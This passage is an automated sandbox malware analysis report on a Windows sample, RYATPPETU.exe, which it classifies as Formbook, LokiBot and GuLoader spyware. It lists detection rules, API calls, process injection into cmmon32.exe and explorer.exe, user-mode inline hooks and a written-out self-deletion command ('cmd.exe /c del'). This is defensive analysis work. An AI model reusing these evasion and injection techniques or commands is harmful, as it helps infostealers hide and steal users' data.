Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB270	0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C16C5	0_2_022C16C5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C1A07	0_2_022C1A07
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BF407	0_2_022BF407
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB81C	0_2_022BB81C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B8648	0_2_022B8648
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C005C	0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C0689	0_2_022C0689
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B9095	0_2_022B9095
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B373D	0_2_022B373D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE7B8	0_2_022BE7B8
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B8BC8	0_2_022B8BC8
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E696E30	8_2_1E696E30
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AEBB0	8_2_1E6AEBB0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731002	8_2_1E731002
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B090	8_2_1E68B090
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E741D55	8_2_1E741D55
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E670D20	8_2_1E670D20
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67F900	8_2_1E67F900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062D07	15_2_05062D07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061D55	15_2_05061D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB090	15_2_04FAB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA841F	15_2_04FA841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051002	15_2_05051002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0	15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581	15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050620A8	15_2_050620A8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F90D20	15_2_04F90D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9F900	15_2_04F9F900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062B28	15_2_05062B28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB6E30	15_2_04FB6E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061FF1	15_2_05061FF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCEBB0	15_2_04FCEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050622AE	15_2_050622AE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062EF7	15_2_05062EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFEBAB	15_2_02EFEBAB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFE1BB	15_2_02EFE1BB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD6F5	15_2_02EFD6F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFEECA	15_2_02EFEECA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE9E4B	15_2_02EE9E4B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE9E50	15_2_02EE9E50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2FB0	15_2_02EE2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2D87	15_2_02EE2D87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2D90	15_2_02EE2D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFDD62	15_2_02EFDD62

Source: C:\Windows\SysWOW64\cmmon32.exe

Code function: String function: 04F9B150 appears 35 times

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB270 NtWriteVirtualMemory,NtAllocateVirtualMemory,	0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C10AF NtProtectVirtualMemory,	0_2_022C10AF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_1E6B9660
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A50 NtCreateFile,LdrInitializeThunk,	8_2_1E6B9A50
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A20 NtResumeThread,LdrInitializeThunk,	8_2_1E6B9A20
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A00 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_1E6B9A00
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_1E6B96E0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9710 NtQueryInformationToken,LdrInitializeThunk,	8_2_1E6B9710
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B97A0 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_1E6B97A0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9780 NtMapViewOfSection,LdrInitializeThunk,	8_2_1E6B9780
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_1E6B9860
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9840 NtDelayExecution,LdrInitializeThunk,	8_2_1E6B9840
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B98F0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_1E6B98F0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9540 NtReadFile,LdrInitializeThunk,	8_2_1E6B9540
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_1E6B9910
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B99A0 NtCreateSection,LdrInitializeThunk,	8_2_1E6B99A0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9670 NtQueryInformationProcess,	8_2_1E6B9670
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9650 NtQueryValueKey,	8_2_1E6B9650
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A10 NtQuerySection,	8_2_1E6B9A10
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9610 NtEnumerateValueKey,	8_2_1E6B9610
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B96D0 NtCreateKey,	8_2_1E6B96D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A80 NtOpenDirectoryObject,	8_2_1E6B9A80
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9760 NtOpenProcess,	8_2_1E6B9760
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9770 NtSetInformationFile,	8_2_1E6B9770
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA770 NtOpenThread,	8_2_1E6BA770
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9730 NtQueryVirtualMemory,	8_2_1E6B9730
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9B00 NtSetValueKey,	8_2_1E6B9B00
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA710 NtOpenProcessToken,	8_2_1E6BA710
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9FE0 NtCreateMutant,	8_2_1E6B9FE0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA3B0 NtGetContextThread,	8_2_1E6BA3B0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BB040 NtSuspendThread,	8_2_1E6BB040
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9820 NtEnumerateKey,	8_2_1E6B9820
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B98A0 NtWriteVirtualMemory,	8_2_1E6B98A0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9560 NtWriteFile,	8_2_1E6B9560
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9950 NtQueueApcThread,	8_2_1E6B9950
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9520 NtWaitForSingleObject,	8_2_1E6B9520
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BAD30 NtSetContextThread,	8_2_1E6BAD30
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B95F0 NtQueryInformationFile,	8_2_1E6B95F0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B99D0 NtCreateProcessEx,	8_2_1E6B99D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B95D0 NtClose,	8_2_1E6B95D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04FD9860
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk,	15_2_04FD9840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD95D0 NtClose,LdrInitializeThunk,	15_2_04FD95D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk,	15_2_04FD99A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk,	15_2_04FD9540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04FD9910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04FD96E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk,	15_2_04FD96D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04FD9660
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk,	15_2_04FD9A50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk,	15_2_04FD9650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk,	15_2_04FD9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk,	15_2_04FD9780
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk,	15_2_04FD9710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD98F0 NtReadVirtualMemory,	15_2_04FD98F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD98A0 NtWriteVirtualMemory,	15_2_04FD98A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDB040 NtSuspendThread,	15_2_04FDB040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9820 NtEnumerateKey,	15_2_04FD9820
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD95F0 NtQueryInformationFile,	15_2_04FD95F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD99D0 NtCreateProcessEx,	15_2_04FD99D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9560 NtWriteFile,	15_2_04FD9560
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9950 NtQueueApcThread,	15_2_04FD9950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDAD30 NtSetContextThread,	15_2_04FDAD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9520 NtWaitForSingleObject,	15_2_04FD9520
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A80 NtOpenDirectoryObject,	15_2_04FD9A80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9670 NtQueryInformationProcess,	15_2_04FD9670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A20 NtResumeThread,	15_2_04FD9A20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9610 NtEnumerateValueKey,	15_2_04FD9610
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A10 NtQuerySection,	15_2_04FD9A10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A00 NtProtectVirtualMemory,	15_2_04FD9A00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA3B0 NtGetContextThread,	15_2_04FDA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD97A0 NtUnmapViewOfSection,	15_2_04FD97A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9770 NtSetInformationFile,	15_2_04FD9770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA770 NtOpenThread,	15_2_04FDA770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9760 NtOpenProcess,	15_2_04FD9760
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9730 NtQueryVirtualMemory,	15_2_04FD9730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA710 NtOpenProcessToken,	15_2_04FDA710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9B00 NtSetValueKey,	15_2_04FD9B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA350 NtCreateFile,	15_2_02EFA350
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA480 NtClose,	15_2_02EFA480
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA400 NtReadFile,	15_2_02EFA400
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA530 NtAllocateVirtualMemory,	15_2_02EFA530
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA3FA NtReadFile,	15_2_02EFA3FA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA3A2 NtReadFile,	15_2_02EFA3A2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA34A NtCreateFile,	15_2_02EFA34A

Source: C:\Users\user\Desktop\RYATPPETU.exe

Process Stats: CPU usage > 98%

Source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RYATPPETU.exe
Source: RYATPPETU.exe, 00000008.00000002.613100559.0000000000119000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs RYATPPETU.exe

Source: RYATPPETU.exe	Virustotal: Detection: 31%
Source: RYATPPETU.exe	ReversingLabs: Detection: 27%

Source: RYATPPETU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\RYATPPETU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'	Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/2

Source: RYATPPETU.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01

Source: C:\Users\user\Desktop\RYATPPETU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00406E6E push edi; iretd	0_2_00406E74
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403200 push 00401122h; ret	0_2_00403213
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403214 push 00401122h; ret	0_2_00403227
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403228 push 00401122h; ret	0_2_0040323B
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00402E34 push 00401122h; ret	0_2_004031C3
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00406537 push eax; iretd	0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031C4 push 00401122h; ret	0_2_004031D7
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031D8 push 00401122h; ret	0_2_004031EB
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031EC push 00401122h; ret	0_2_004031FF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00405C9B push cs; iretd	0_2_00405CA1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_0040659F push eax; iretd	0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B0A23 push ebp; ret	0_2_022B0A24
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B248F push ecx; retn F8CCh	0_2_022B25C8
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BD102 push ebx; ret	0_2_022BD106
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B6983 push esi; iretd	0_2_022B6984
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B3FEA push ds; ret	0_2_022B3FF2
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B4BF0 push es; retf	0_2_022B4C08
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6CD0D1 push ecx; ret	8_2_1E6CD0E4
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_00572BD6 push es; retn 003Ch	8_2_00572BEE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FED0D1 push ecx; ret	15_2_04FED0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EF7921 push eax; ret	15_2_02EF7932
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA6CE push ecx; iretd	15_2_02EFA6CF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA7B8 push ebp; iretd	15_2_02EFA7B9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4FB push eax; ret	15_2_02EFD562
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4F2 push eax; ret	15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4A5 push eax; ret	15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFCC98 push 00000048h; retf	15_2_02EFCC9A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFCC95 pushad ; ret	15_2_02EFCC96
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFC422 push edx; iretd	15_2_02EFC424
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EF5406 push es; ret	15_2_02EF540C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD55C push eax; ret	15_2_02EFD562

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC

Self deletion via cmd delete

